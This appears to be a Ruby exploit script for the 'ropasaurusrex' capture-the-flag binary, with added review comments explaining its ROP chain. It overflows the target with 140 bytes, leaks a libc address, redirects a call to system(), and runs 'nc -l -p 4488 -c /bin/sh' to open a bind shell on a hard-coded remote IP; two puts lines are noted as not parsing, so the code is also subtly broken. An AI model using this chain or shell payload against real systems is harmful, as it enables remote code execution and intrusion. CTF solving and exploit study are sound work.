Created
April 22, 2013 16:45
#!/usr/bin/ruby
#
# ROP-chain exploit script for a CTF challenge binary ("ropasaurusrex", per
# the commented-out local invocation at the bottom), delivered over TCP.
#
# Reading the chain below: a fixed 140 bytes of padding overwrite the saved
# return address; execution is then steered through 'write' and 'read' using a
# pop;pop;pop;ret gadget to (1) leak one libc address, (2) place a string in
# writable memory, and (3) overwrite a function pointer so that a later call
# lands on an address computed from the leak, with that string as its argument.
#
# Assumptions baked into the script (all hard-coded, none checked at run time):
#   - the binary is mapped at a fixed address (presumably built without PIE);
#     otherwise every 0x0804xxxx constant below is wrong;
#   - the target's libc build matches offset_execlp / offset_system exactly;
#   - no stack canary sits between the overflowed buffer and the saved return
#     address (the padding is constant and nothing is leaked to restore one).
# PIE+ASLR, stack protectors, and a read-only GOT (full RELRO) each invalidate
# one of those assumptions; which of them the real binary lacked is not
# visible from this file.
require 'socket'

# Fixed addresses inside the target binary. From how they are used below:
# 'read'/'write' are call targets (presumably PLT stubs), 'ptr_write' is the
# 4-byte slot holding write's resolved address (presumably its GOT entry),
# 'pppr' is a pop;pop;pop;ret gadget, 'writable_data_section' is scratch space.
read = 0x0804832C
write = 0x0804830C
ptr_write = 0x08049614
pppr = 0x80484e4                   # pop pop pop ret: discards 3 args between chained calls
writable_data_section = 0x08049620
# NUL-terminated string that the second stage writes into the process and
# that the final call receives as its argument. Length includes the "\x00".
bytes_to_write = "nc -l -p 4488 -c /bin/sh\x00"
#bytes_to_write = "cat /home/ropasaurusrex/key\x00"
# Distances from 'write' to the two candidate call targets in the target's
# libc. Hard-coded, so the script is tied to one specific libc build.
offset_execlp = 0x263a0 # offset from 'write'
offset_system = 0x85d40
i = 0x08049614                     # NOTE(review): assigned but never referenced below
addr = write                       # first return target after the overflow
# The ROP chain, one 32-bit word per element (see the pack("L*") below).
# Each 'pppr' entry is the return address of the call before it and pops the
# following three words, so the next element in the list is the next target.
params = [
# Read the 4-byte address of 'write' so we can calculate execlp
pppr, # return address (pop pop pop ret)
1, # handle (stdout)
ptr_write, # buf
0x00000004, # length
# Return address for the pppr
read,
# Write "bytes_to_write" to "writable_data_section" (ie, write the command that will be passed to execlp)
pppr, # return address (pop pop pop ret)
0, # handle (stdin)
writable_data_section, # buffer
bytes_to_write.length, # length (includes the trailing NUL)
# Return address for the pppr
write,
# Write "WIN" to the console to make sure things are working
pppr, # return address
1, # handle (stdout)
0x08048510, # buf (presumably a static string in the binary — not verifiable here)
4, # length
# Return address for the pppr
read,
# Write the 4-byte address of execlp to writable memory (the address of 'read' right now)
# (the value actually sent in the second stage below is system_address, not execlp)
pppr, # return address
0, # handle (stdin)
0x0804961c, # buffer (address of 'read')
4,
# Final call through 'read': its pointer slot was just overwritten, so this
# call lands on the address supplied in the second stage.
read,
0x48484848, # return address after the final call (never meant to be reached)
writable_data_section, # first argument: the string written earlier
writable_data_section,
0
]
# Stage 1 payload: padding up to the saved return address, the first target,
# then the chain. "L" packs a native-endian 32-bit unsigned int, so the byte
# order depends on the host running this script, not on the target.
sploit = ''
sploit += ("A" * 140)
sploit += [addr].pack("L")
sploit += params.pack("L*")
#s = TCPSocket.new("localhost", 1025)
s = TCPSocket.new("54.234.151.114", 1025)  # hard-coded remote target; local variant above
s.write(sploit)
# Leak consumed by the first 'write' in the chain.
# NOTE(review): s.read(4) can return nil or a short read; unpack/pop would then raise — nothing checks it.
write_address = s.read(4).unpack("L").pop
execlp_address = write_address - offset_execlp
system_address = write_address - offset_system
# NOTE(review): a string literal immediately followed by an identifier does not
# parse in Ruby; as written these two lines abort the script before stage 2 is sent.
puts("execlp address: x" execlp_address)
puts("system address: x" system_address)
# Stage 2: inputs consumed, in order, by the two 'read' calls in the chain.
s.write(bytes_to_write) # write our data to a known address
s.write([system_address].pack("L")) # The function to call (overwrites the 'read' pointer slot)
puts(s.read(3))   # presumably the "WIN" bytes written by the chain — TODO confirm
#s.write("pwd")
puts(s.read())    # blocks until the remote side closes the connection
#system("nc 54.234.151.114 1025 < file")
#system("./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d < file")